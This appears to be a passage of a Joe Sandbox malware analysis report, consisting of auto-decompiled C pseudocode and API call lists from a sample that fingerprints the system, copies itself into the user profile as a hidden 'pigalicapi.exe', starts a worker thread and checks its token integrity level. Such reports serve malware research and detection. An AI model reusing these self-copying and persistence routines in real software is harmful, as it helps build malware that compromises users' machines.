                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1593741596-0
                                                                                                                                                                                                                                                                          • Opcode ID: 05fe0913d4c170341a487d691e6358ffadb3a1425a440243058cc0667604890e
                                                                                                                                                                                                                                                                          • Instruction ID: 8bdf0d2272c993105e18f632bfcb20d3462f1ee8570acd5c3bdc395bff94e74a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05fe0913d4c170341a487d691e6358ffadb3a1425a440243058cc0667604890e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A910D74A04208AFEB14DFA4D849BDDBBB5FB48705F108219FA05BB2C0D778A984CF55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                          			E04005700(CHAR* _a4) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				char _v556;
                                                                                                                                                                                                                                                                          				long _v560;
                                                                                                                                                                                                                                                                          				void* _v564;
                                                                                                                                                                                                                                                                          				long _v568;
                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                          				void* _t67;
                                                                                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					E04008F80(_a4, 0x100, _a4 + 0x437); // executed
                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0, _a4 + 0x100, 0x104);
                                                                                                                                                                                                                                                                          					E04001CA0(_a4 + 0x204, 0x104); // executed
                                                                                                                                                                                                                                                                          					E04009D20( &_v24, _a4 + 0x40c, 0x27); // executed
                                                                                                                                                                                                                                                                          					E04007B70(_a4 + 0x45b,  &_v24, 0x10);
                                                                                                                                                                                                                                                                          					_t59 = E04005CD0(_a4 + 0x100); // executed
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_a4 + 0x433)) = _t59;
                                                                                                                                                                                                                                                                          					lstrcpyA(_a4 + 0x43b, "pigalicapi");
                                                                                                                                                                                                                                                                          					E04007D20( &_v556,  &_v556, 0, 0x208);
                                                                                                                                                                                                                                                                          					_v28 = 0x207;
                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v556, 0x207);
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v556,  &_v28);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					wnsprintfA(_a4 + 0x308, 0x104, "%s\\%s.exe",  &_v556, "pigalicapi");
                                                                                                                                                                                                                                                                          					_t67 = CreateFileA(_a4 + 0x100, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                          					_v32 = _t67;
                                                                                                                                                                                                                                                                          					if(_v32 != 0xffffffff) {
                                                                                                                                                                                                                                                                          						_v560 = GetFileSize(_v32, 0);
                                                                                                                                                                                                                                                                          						if(_v560 > 0) {
                                                                                                                                                                                                                                                                          							_t71 = VirtualAlloc(0, _v560, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          							_v564 = _t71;
                                                                                                                                                                                                                                                                          							if(_v564 != 0) {
                                                                                                                                                                                                                                                                          								_v568 = 0;
                                                                                                                                                                                                                                                                          								ReadFile(_v32, _v564, _v560,  &_v568, 0); // executed
                                                                                                                                                                                                                                                                          								if(_v568 != _v560) {
                                                                                                                                                                                                                                                                          									VirtualFree(_v564, 0, 0x8000);
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									 *(_a4 + 0x453) = _v560;
                                                                                                                                                                                                                                                                          									 *(_a4 + 0x457) = _v564;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CloseHandle(_v32);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v5 = 1;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                          0x04005709
                                                                                                                                                                                                                                                                          0x04005711
                                                                                                                                                                                                                                                                          0x04005729
                                                                                                                                                                                                                                                                          0x04005742
                                                                                                                                                                                                                                                                          0x04005756
                                                                                                                                                                                                                                                                          0x0400576e
                                                                                                                                                                                                                                                                          0x04005786
                                                                                                                                                                                                                                                                          0x04005798
                                                                                                                                                                                                                                                                          0x040057a3
                                                                                                                                                                                                                                                                          0x040057b8
                                                                                                                                                                                                                                                                          0x040057cc
                                                                                                                                                                                                                                                                          0x040057d4
                                                                                                                                                                                                                                                                          0x040057e4
                                                                                                                                                                                                                                                                          0x0400580a
                                                                                                                                                                                                                                                                          0x040057e6
                                                                                                                                                                                                                                                                          0x040057f1
                                                                                                                                                                                                                                                                          0x040057f1
                                                                                                                                                                                                                                                                          0x0400582f
                                                                                                                                                                                                                                                                          0x04005854
                                                                                                                                                                                                                                                                          0x0400585a
                                                                                                                                                                                                                                                                          0x04005861
                                                                                                                                                                                                                                                                          0x04005873
                                                                                                                                                                                                                                                                          0x04005880
                                                                                                                                                                                                                                                                          0x04005896
                                                                                                                                                                                                                                                                          0x0400589c
                                                                                                                                                                                                                                                                          0x040058a9
                                                                                                                                                                                                                                                                          0x040058ab
                                                                                                                                                                                                                                                                          0x040058d0
                                                                                                                                                                                                                                                                          0x040058e2
                                                                                                                                                                                                                                                                          0x04005912
                                                                                                                                                                                                                                                                          0x040058e4
                                                                                                                                                                                                                                                                          0x040058ed
                                                                                                                                                                                                                                                                          0x040058fc
                                                                                                                                                                                                                                                                          0x040058fc
                                                                                                                                                                                                                                                                          0x040058e2
                                                                                                                                                                                                                                                                          0x040058a9
                                                                                                                                                                                                                                                                          0x0400591c
                                                                                                                                                                                                                                                                          0x0400591c
                                                                                                                                                                                                                                                                          0x04005922
                                                                                                                                                                                                                                                                          0x04005922
                                                                                                                                                                                                                                                                          0x0400592c

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: GetVersionExA.KERNEL32(0000009C), ref: 04008FF7
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: GetSystemInfo.KERNEL32(?), ref: 04009009
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 0400902E
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,_x64), ref: 04009222
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrlenA.KERNEL32(?), ref: 0400922F
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,0400C980), ref: 04009242
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,?), ref: 04009253
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrlenA.KERNEL32(00000000), ref: 0400925D
                                                                                                                                                                                                                                                                            • Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 04009275
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 04005742
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04001CB1
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: Process32First.KERNEL32(000000FF,00000128), ref: 04001CE1
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: GetCurrentProcessId.KERNEL32 ref: 04001CEE
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: Process32First.KERNEL32(000000FF,00000128), ref: 04001D52
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 04001D78
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 04001D92
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04001DA6
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 04001DDC
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001DFB
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E21
                                                                                                                                                                                                                                                                            • Part of subcall function 04001CA0: CloseHandle.KERNEL32(000000FF), ref: 04001E4B
                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: GetSystemDirectoryA.KERNEL32 ref: 04009D9A
                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 04009DDD
                                                                                                                                                                                                                                                                            • Part of subcall function 04009D20: StringFromCLSID.OLE32(00000020,?), ref: 04009EF7
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: lstrlenA.KERNEL32(00000000), ref: 04005CEB
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005D10
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 04005D29
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005D45
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04005D6D
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04005D99
                                                                                                                                                                                                                                                                            • Part of subcall function 04005CD0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 04005DA3
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 040057B8
                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 040057F1
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 0400580A
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 0400582F
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005854
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 0400586D
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005896
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 040058D0
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04005912
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0400591C
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$lstrcat$CloseVirtuallstrlen$CreateProcess$AllocChangeDirectoryFindFirstFreeHandleModuleNameNotificationProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
                                                                                                                                                                                                                                                                          • String ID: %s\%s.exe$USERPROFILE$pigalicapi
                                                                                                                                                                                                                                                                          • API String ID: 560841407-4090404022
                                                                                                                                                                                                                                                                          • Opcode ID: d5d8b7378ef743f007312c818edffbb4ef282e82611c05111bfa373c5cb79892
                                                                                                                                                                                                                                                                          • Instruction ID: 5a1df65dd39d11d2feffdc598e8508d5089156913625d6b4e9fa29ff03a3d0d3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5d8b7378ef743f007312c818edffbb4ef282e82611c05111bfa373c5cb79892
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66515FB4944208BBFB14DF60DC59FEA7774EB44709F048168FA097A2C1D778AA81CF94
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 754 4001120-4001134 755 400113a-400113e 754->755 756 40012bb-40012c1 754->756 755->756 757 4001144-4001150 lstrlenA 755->757 757->756 758 4001156-4001162 lstrlenA 757->758 758->756 759 4001168-4001175 758->759 760 4001177-4001188 GetAllUsersProfileDirectoryA 759->760 761 400118a-400119b GetEnvironmentVariableA 759->761 762 40011a1-40011d9 wnsprintfA lstrcmpiA 760->762 761->762 763 4001216-4001287 call 40097a0 lstrcpyA * 2 CreateThread 762->763 764 40011db-40011e1 762->764 768 40012a3-40012b8 call 40097c0 763->768 769 4001289-400128d 763->769 764->763 765 40011e3-4001210 CopyFileA SetFileAttributesA lstrcpyA 764->765 765->763 768->756 770 400129a-40012a1 769->770 771 400128f-4001298 769->771 770->756 771->770
                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                          			E04001120(CHAR* _a4, CHAR* _a8, signed int _a12, signed char _a16, void** _a20) {
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				char _v284;
                                                                                                                                                                                                                                                                          				void* _v288;
                                                                                                                                                                                                                                                                          				char _v556;
                                                                                                                                                                                                                                                                          				void* _v560;
                                                                                                                                                                                                                                                                          				void* _v564;
                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && lstrlenA(_a4) != 0 && lstrlenA(_a8) != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0x104;
                                                                                                                                                                                                                                                                          					if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v284, 0x104);
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v284,  &_v12);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					wnsprintfA( &_v556, 0x103, "%s\\%s.exe",  &_v284, _a8);
                                                                                                                                                                                                                                                                          					if(lstrcmpiA(_a4,  &_v556) != 0 && (_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						CopyFileA(_a4,  &_v556, 0); // executed
                                                                                                                                                                                                                                                                          						SetFileAttributesA( &_v556, 6); // executed
                                                                                                                                                                                                                                                                          						lstrcpyA(_a4,  &_v556);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v560 = E040097A0(0x30d);
                                                                                                                                                                                                                                                                          					_v16 = _v560;
                                                                                                                                                                                                                                                                          					 *((char*)(_v16 + 0x30c)) = _a12;
                                                                                                                                                                                                                                                                          					lstrcpyA(_v16,  &_v556);
                                                                                                                                                                                                                                                                          					lstrcpyA(_v16 + 0x208, _a8);
                                                                                                                                                                                                                                                                          					_t58 = CreateThread(0, 0, E040012D0, _v16, 0, 0); // executed
                                                                                                                                                                                                                                                                          					_v288 = _t58;
                                                                                                                                                                                                                                                                          					if(_v288 == 0) {
                                                                                                                                                                                                                                                                          						_v564 = _v16;
                                                                                                                                                                                                                                                                          						E040097C0(_v564);
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						if(_a20 != 0) {
                                                                                                                                                                                                                                                                          							 *_a20 = _v288;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v8 = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                          0x04001129
                                                                                                                                                                                                                                                                          0x04001134
                                                                                                                                                                                                                                                                          0x04001168
                                                                                                                                                                                                                                                                          0x04001175
                                                                                                                                                                                                                                                                          0x0400119b
                                                                                                                                                                                                                                                                          0x04001177
                                                                                                                                                                                                                                                                          0x04001182
                                                                                                                                                                                                                                                                          0x04001182
                                                                                                                                                                                                                                                                          0x040011bd
                                                                                                                                                                                                                                                                          0x040011d9
                                                                                                                                                                                                                                                                          0x040011f0
                                                                                                                                                                                                                                                                          0x040011ff
                                                                                                                                                                                                                                                                          0x04001210
                                                                                                                                                                                                                                                                          0x04001210
                                                                                                                                                                                                                                                                          0x04001223
                                                                                                                                                                                                                                                                          0x0400122f
                                                                                                                                                                                                                                                                          0x04001238
                                                                                                                                                                                                                                                                          0x04001249
                                                                                                                                                                                                                                                                          0x0400125d
                                                                                                                                                                                                                                                                          0x04001274
                                                                                                                                                                                                                                                                          0x0400127a
                                                                                                                                                                                                                                                                          0x04001287
                                                                                                                                                                                                                                                                          0x040012a6
                                                                                                                                                                                                                                                                          0x040012b3
                                                                                                                                                                                                                                                                          0x04001289
                                                                                                                                                                                                                                                                          0x0400128d
                                                                                                                                                                                                                                                                          0x04001298
                                                                                                                                                                                                                                                                          0x04001298
                                                                                                                                                                                                                                                                          0x0400129a
                                                                                                                                                                                                                                                                          0x0400129a
                                                                                                                                                                                                                                                                          0x04001287
                                                                                                                                                                                                                                                                          0x040012c1

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04001148
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0400115A
                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 04001182
                                                                                                                                                                                                                                                                            • Part of subcall function 040097C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 040097CF
                                                                                                                                                                                                                                                                            • Part of subcall function 040097C0: HeapFree.KERNEL32(00000000), ref: 040097D6
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 0400119B
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040011BD
                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000104,?), ref: 040011D1
                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(00000104,?,00000000), ref: 040011F0
                                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000006), ref: 040011FF
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000104,?), ref: 04001210
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,?), ref: 04001249
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-00000208,00000000), ref: 0400125D
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04001274
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
                                                                                                                                                                                                                                                                          • String ID: %s\%s.exe$USERPROFILE
                                                                                                                                                                                                                                                                          • API String ID: 1231128424-1744756051
                                                                                                                                                                                                                                                                          • Opcode ID: b85ef1de13e11c0e00b9ed9ca29e0f6effca0754590a52f5089cd6d741d3fe99
                                                                                                                                                                                                                                                                          • Instruction ID: 5a94151192094d4d6073c3e413aca9132142fa07401a96dcdce05a8263d9ef35
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b85ef1de13e11c0e00b9ed9ca29e0f6effca0754590a52f5089cd6d741d3fe99
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A413675904208ABEB54CFA4D889BDE77B4EF48704F00C295F509AA281D779EA84CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                                                                                                          			E040099F0() {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				char _v9;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				char _v1044;
                                                                                                                                                                                                                                                                          				char _v2068;
                                                                                                                                                                                                                                                                          				long _v2072;
                                                                                                                                                                                                                                                                          				void* _v2076;
                                                                                                                                                                                                                                                                          				void* _v2080;
                                                                                                                                                                                                                                                                          				char _v2084;
                                                                                                                                                                                                                                                                          				int _t43;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                          				_v8 = 0x400;
                                                                                                                                                                                                                                                                          				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v16) == 0) {
                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                          					return _v9;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v2072 = 0;
                                                                                                                                                                                                                                                                          				GetTokenInformation(_v16, 1, 0, 0,  &_v2072); // executed
                                                                                                                                                                                                                                                                          				if(_v2072 >= 0x400) {
                                                                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                                                                          					CloseHandle(_v16);
                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v2076 =  &_v1044;
                                                                                                                                                                                                                                                                          				_t43 = GetTokenInformation(_v16, 1, _v2076, _v2072,  &_v2072); // executed
                                                                                                                                                                                                                                                                          				if(_t43 == 0) {
                                                                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v2080 =  &_v2068;
                                                                                                                                                                                                                                                                          				_v2084 = 0x44;
                                                                                                                                                                                                                                                                          				__imp__CreateWellKnownSid(0xc, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                          				if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                          					__imp__CreateWellKnownSid(0x16, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                          					if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                          						__imp__CreateWellKnownSid(0x17, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                          						if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                          							__imp__CreateWellKnownSid(0x18, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                          							if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                          								goto L11;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x040099f9
                                                                                                                                                                                                                                                                          0x040099fd
                                                                                                                                                                                                                                                                          0x04009a19
                                                                                                                                                                                                                                                                          0x04009b80
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b80
                                                                                                                                                                                                                                                                          0x04009a1f
                                                                                                                                                                                                                                                                          0x04009a3a
                                                                                                                                                                                                                                                                          0x04009a4a
                                                                                                                                                                                                                                                                          0x04009b76
                                                                                                                                                                                                                                                                          0x04009b7a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b7a
                                                                                                                                                                                                                                                                          0x04009a56
                                                                                                                                                                                                                                                                          0x04009a77
                                                                                                                                                                                                                                                                          0x04009a7f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009a8b
                                                                                                                                                                                                                                                                          0x04009a91
                                                                                                                                                                                                                                                                          0x04009aad
                                                                                                                                                                                                                                                                          0x04009acb
                                                                                                                                                                                                                                                                          0x04009ae6
                                                                                                                                                                                                                                                                          0x04009b04
                                                                                                                                                                                                                                                                          0x04009b1c
                                                                                                                                                                                                                                                                          0x04009b3a
                                                                                                                                                                                                                                                                          0x04009b52
                                                                                                                                                                                                                                                                          0x04009b70
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b72
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b3c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b06
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 04009A0A
                                                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 04009A11
                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04009A3A
                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 04009A77
                                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 04009AAD
                                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?,00000000), ref: 04009AC3
                                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 04009AE6
                                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?), ref: 04009AFC
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04009B7A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                                          • String ID: D
